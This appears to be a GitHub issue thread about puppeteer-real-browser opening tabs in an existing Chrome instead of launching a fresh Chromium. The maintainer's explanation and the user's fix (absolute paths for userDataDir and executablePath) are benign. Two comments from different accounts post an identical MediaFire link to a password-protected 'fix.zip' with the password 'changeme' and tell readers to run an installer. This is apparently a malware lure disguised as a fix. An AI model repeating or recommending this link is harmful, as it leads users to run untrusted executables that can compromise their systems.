### ISSUE TITLE
How to Launch a New Chromium Instance Instead of Using the Chrome Browser Already Running?

### ISSUE THREAD

**Issue by aguyinmontreal** [zfcsoftware/puppeteer-real-browser#144]
I’m a bit of a newbie with Puppeteer, so I hope it’s okay to ask for some help! I’m trying to start a new instance of the default Puppeteer Chromium browser, but I keep running into the same issue.

Every time I run `await connect({...})`, it just opens a new tab in my regular Chrome browser, which I use for personal browsing. What I really want is to launch a completely fresh Chromium instance for my Puppeteer session. I’ve been struggling to get puppeteer-real-browser to do this.

Here’s what I’ve tried so far:

- I added `executablePath: puppeteer.executablePath()` to the `customConfig` object.
- I also tried launching Puppeteer with `puppeteer.launch()` before running `await connect({...})`.

Unfortunately, neither of these solutions worked. Instead, it just opens a new tab in my existing Chrome, and that tab stays blank. Even `await page.goto(url);` doesn’t seem to do anything.

I’d really appreciate any tips or suggestions on how to get a new Chromium instance running. Thanks in advance!

Windows 10
NodeJS v20.11.0

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zfcsoftware** [comment]
Each time it connects, a new browser is opened with chrome-launcher and used. It does not connect to the same browser. .connect connects to the newly opened browser.

**Comment by aguyinmontreal** [comment]
@zfcsoftware Found what was causing the issue:  my `userDataDir` and `executablePath` properties in the `customConfig` object had a relative path instead of a full path.
